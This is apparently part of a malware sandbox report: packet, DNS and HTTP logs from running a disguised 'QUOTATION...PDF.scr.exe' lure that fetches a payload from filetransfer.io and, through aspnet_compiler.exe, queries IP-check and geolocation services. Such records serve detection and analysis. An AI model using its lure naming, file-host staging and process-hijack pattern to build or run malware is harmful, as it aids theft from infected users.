Nov 18, 2024 11:45:11.786417961 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.786422014 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.786469936 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.786531925 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.786576033 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.786606073 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.786609888 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.786639929 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.786660910 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.791579962 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.791620970 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.791685104 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.791690111 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.791763067 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.791996002 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.792038918 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.792078972 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.792083025 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.792110920 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.792135954 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.828093052 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.828155994 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.828259945 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.828264952 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.828300953 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.828300953 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.828671932 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.828727007 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.828774929 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.828778982 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.828824043 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.828824043 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.899462938 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.899512053 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.899642944 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.899652958 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.899760008 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.899830103 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.899879932 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.899955034 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.899955034 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.899960041 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.899998903 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.900283098 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.900326014 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.900409937 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.900409937 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.900414944 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.900475025 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.900495052 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.900544882 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.900580883 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.900584936 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.900635004 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.900635004 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.900675058 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.900791883 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.900795937 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.900830030 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.900902987 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.901494026 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:56.324961901 CET	49936	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:56.330462933 CET	80	49936	132.226.247.73	192.168.2.5
Nov 18, 2024 11:45:56.330573082 CET	49936	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:56.330785990 CET	49936	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:56.335943937 CET	80	49936	132.226.247.73	192.168.2.5
Nov 18, 2024 11:45:57.204216003 CET	80	49936	132.226.247.73	192.168.2.5
Nov 18, 2024 11:45:57.210289001 CET	49936	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:57.215907097 CET	80	49936	132.226.247.73	192.168.2.5
Nov 18, 2024 11:45:57.573945045 CET	80	49936	132.226.247.73	192.168.2.5
Nov 18, 2024 11:45:57.607563972 CET	49942	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:57.607654095 CET	443	49942	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:57.607755899 CET	49942	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:57.611422062 CET	49942	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:57.611452103 CET	443	49942	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:57.617739916 CET	49936	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:57.662200928 CET	49704	80	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:58.221473932 CET	443	49942	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:58.221755981 CET	49942	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:58.226432085 CET	49942	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:58.226448059 CET	443	49942	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:58.226881981 CET	443	49942	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:58.273983955 CET	49942	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:58.276051998 CET	49942	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:58.319335938 CET	443	49942	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:58.413161039 CET	443	49942	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:58.413239002 CET	443	49942	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:58.413288116 CET	49942	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:58.422106028 CET	49942	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:58.426021099 CET	49936	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:58.432391882 CET	80	49936	132.226.247.73	192.168.2.5
Nov 18, 2024 11:45:58.687031031 CET	80	49936	132.226.247.73	192.168.2.5
Nov 18, 2024 11:45:58.690870047 CET	49950	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:58.690977097 CET	443	49950	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:58.691042900 CET	49950	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:58.691253901 CET	49950	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:58.691289902 CET	443	49950	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:58.727133989 CET	49936	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:59.305974960 CET	443	49950	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:59.307744980 CET	49950	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:59.307818890 CET	443	49950	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:59.449814081 CET	443	49950	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:59.449862957 CET	443	49950	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:59.450092077 CET	49950	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:59.450309038 CET	49950	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:59.453774929 CET	49936	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:59.454849958 CET	49955	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:59.459532022 CET	80	49936	132.226.247.73	192.168.2.5
Nov 18, 2024 11:45:59.459619045 CET	49936	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:59.460102081 CET	80	49955	132.226.247.73	192.168.2.5
Nov 18, 2024 11:45:59.460335016 CET	49955	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:59.460335016 CET	49955	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:45:59.465825081 CET	80	49955	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:01.558518887 CET	80	49955	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:01.560034990 CET	49970	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:01.560117006 CET	443	49970	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:01.560204029 CET	49970	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:01.560414076 CET	49970	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:01.560435057 CET	443	49970	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:01.602260113 CET	49955	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:02.161928892 CET	443	49970	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:02.163192034 CET	49970	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:02.163275003 CET	443	49970	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:02.300712109 CET	443	49970	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:02.300779104 CET	443	49970	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:02.300952911 CET	49970	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:02.301228046 CET	49970	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:02.304891109 CET	49974	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:02.310839891 CET	80	49974	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:02.311074972 CET	49974	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:02.311074972 CET	49974	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:02.322652102 CET	80	49974	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:03.177588940 CET	80	49974	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:03.178899050 CET	49980	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:03.178992033 CET	443	49980	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:03.180111885 CET	49980	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:03.180388927 CET	49980	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:03.180423021 CET	443	49980	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:03.227356911 CET	49974	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:03.792426109 CET	443	49980	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:03.793819904 CET	49980	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:03.793904066 CET	443	49980	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:03.930483103 CET	443	49980	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:03.930638075 CET	443	49980	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:03.930938005 CET	49980	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:03.938096046 CET	49980	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:03.941293001 CET	49974	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:03.942418098 CET	49984	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:03.947122097 CET	80	49974	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:03.947304010 CET	49974	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:03.947777987 CET	80	49984	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:03.948013067 CET	49984	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:03.948013067 CET	49984	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:03.953788042 CET	80	49984	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:04.834595919 CET	80	49984	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:04.835824013 CET	49987	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:04.835874081 CET	443	49987	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:04.836108923 CET	49987	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:04.836162090 CET	49987	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:04.836175919 CET	443	49987	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:04.883711100 CET	49984	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:05.444719076 CET	443	49987	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:05.446178913 CET	49987	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:05.446255922 CET	443	49987	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:05.588711977 CET	443	49987	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:05.588810921 CET	443	49987	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:05.588861942 CET	49987	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:05.589231968 CET	49987	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:05.592035055 CET	49984	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:05.592845917 CET	49988	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:05.597636938 CET	80	49984	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:05.597836018 CET	49984	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:05.597935915 CET	80	49988	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:05.598006010 CET	49988	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:05.598119020 CET	49988	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:05.603144884 CET	80	49988	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:06.458625078 CET	80	49988	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:06.459835052 CET	49989	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:06.459930897 CET	443	49989	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:06.460041046 CET	49989	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:06.460400105 CET	49989	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:06.460433960 CET	443	49989	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:06.500905991 CET	49988	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:07.068662882 CET	443	49989	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:07.069966078 CET	49989	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:07.070012093 CET	443	49989	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:07.211360931 CET	443	49989	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:07.211433887 CET	443	49989	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:07.211630106 CET	49989	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:07.212260008 CET	49989	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:07.215177059 CET	49988	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:07.216212988 CET	49990	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:07.220470905 CET	80	49988	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:07.220541000 CET	49988	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:07.221123934 CET	80	49990	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:07.221196890 CET	49990	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:07.221295118 CET	49990	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:07.226774931 CET	80	49990	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:08.093291998 CET	80	49990	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:08.094453096 CET	49991	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:08.094506025 CET	443	49991	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:08.094588041 CET	49991	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:08.094796896 CET	49991	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:08.094806910 CET	443	49991	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:08.133377075 CET	49990	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:08.704871893 CET	443	49991	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:08.706048965 CET	49991	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:08.706129074 CET	443	49991	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:08.845041990 CET	443	49991	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:08.845092058 CET	443	49991	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:08.845292091 CET	49991	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:08.845741034 CET	49991	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:08.848589897 CET	49990	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:08.849040985 CET	49992	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:08.854132891 CET	80	49990	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:08.854557991 CET	80	49992	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:08.854630947 CET	49990	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:08.854650974 CET	49992	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:08.854763031 CET	49992	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:08.859750032 CET	80	49992	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:09.719069004 CET	80	49992	132.226.247.73	192.168.2.5
Nov 18, 2024 11:46:09.720432997 CET	49993	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:09.720523119 CET	443	49993	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:09.720633984 CET	49993	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:09.720870972 CET	49993	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:09.720891953 CET	443	49993	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:09.774023056 CET	49992	80	192.168.2.5	132.226.247.73
Nov 18, 2024 11:46:10.318352938 CET	443	49993	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:10.319401979 CET	49993	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:10.319487095 CET	443	49993	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:10.455744028 CET	443	49993	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:10.455796957 CET	443	49993	188.114.96.3	192.168.2.5
Nov 18, 2024 11:46:10.455934048 CET	49993	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:46:10.456289053 CET	49993	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:47:06.688513994 CET	80	49955	132.226.247.73	192.168.2.5
Nov 18, 2024 11:47:06.688607931 CET	49955	80	192.168.2.5	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 11:45:06.194061041 CET	50034	53	192.168.2.5	1.1.1.1
Nov 18, 2024 11:45:06.208651066 CET	53	50034	1.1.1.1	192.168.2.5
Nov 18, 2024 11:45:09.299307108 CET	62093	53	192.168.2.5	1.1.1.1
Nov 18, 2024 11:45:09.310859919 CET	53	62093	1.1.1.1	192.168.2.5
Nov 18, 2024 11:45:56.312427998 CET	62056	53	192.168.2.5	1.1.1.1
Nov 18, 2024 11:45:56.319957018 CET	53	62056	1.1.1.1	192.168.2.5
Nov 18, 2024 11:45:57.594580889 CET	59081	53	192.168.2.5	1.1.1.1
Nov 18, 2024 11:45:57.604799986 CET	53	59081	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2024 11:45:06.194061041 CET	192.168.2.5	1.1.1.1	0xdb08	Standard query (0)	filetransfer.io	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:09.299307108 CET	192.168.2.5	1.1.1.1	0x8d0f	Standard query (0)	s24.filetransfer.io	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:56.312427998 CET	192.168.2.5	1.1.1.1	0x5912	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:57.594580889 CET	192.168.2.5	1.1.1.1	0xf21b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 18, 2024 11:45:06.208651066 CET	1.1.1.1	192.168.2.5	0xdb08	No error (0)	filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:06.208651066 CET	1.1.1.1	192.168.2.5	0xdb08	No error (0)	filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:09.310859919 CET	1.1.1.1	192.168.2.5	0x8d0f	No error (0)	s24.filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:09.310859919 CET	1.1.1.1	192.168.2.5	0x8d0f	No error (0)	s24.filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:56.319957018 CET	1.1.1.1	192.168.2.5	0x5912	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 11:45:56.319957018 CET	1.1.1.1	192.168.2.5	0x5912	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:56.319957018 CET	1.1.1.1	192.168.2.5	0x5912	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:56.319957018 CET	1.1.1.1	192.168.2.5	0x5912	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:56.319957018 CET	1.1.1.1	192.168.2.5	0x5912	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:56.319957018 CET	1.1.1.1	192.168.2.5	0x5912	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:57.604799986 CET	1.1.1.1	192.168.2.5	0xf21b	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 11:45:57.604799986 CET	1.1.1.1	192.168.2.5	0xf21b	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

filetransfer.io

s24.filetransfer.io

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	188.114.97.3	80	828	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 11:45:06.226984024 CET	95	OUT	GET /data-package/zWkbOqX7/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
Nov 18, 2024 11:45:07.504254103 CET	994	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 18 Nov 2024 10:45:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://filetransfer.io/data-package/zWkbOqX7/download cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qUbL76%2FY5rHTLOLAd1srQMO5MJgqTGtLoFsX%2FMP8BG1AmSY8wOTqEhQ7h4%2BaegKKBwyjAiQfRbA2R38GaI4uM88v50jJ76txS96ZcgPeMAAc3hzJdeJBxi7JPFOj7Gg48hk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e475e7fdb02ddb0-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1396&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=95&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49936	132.226.247.73	80	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 11:45:56.330785990 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 11:45:57.204216003 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:45:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8f292361676a25ccc9a92028bca17be2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 11:45:57.210289001 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 11:45:57.573945045 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:45:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d1c0a34701365d6ed6782d03f82fef54 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 11:45:58.426021099 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
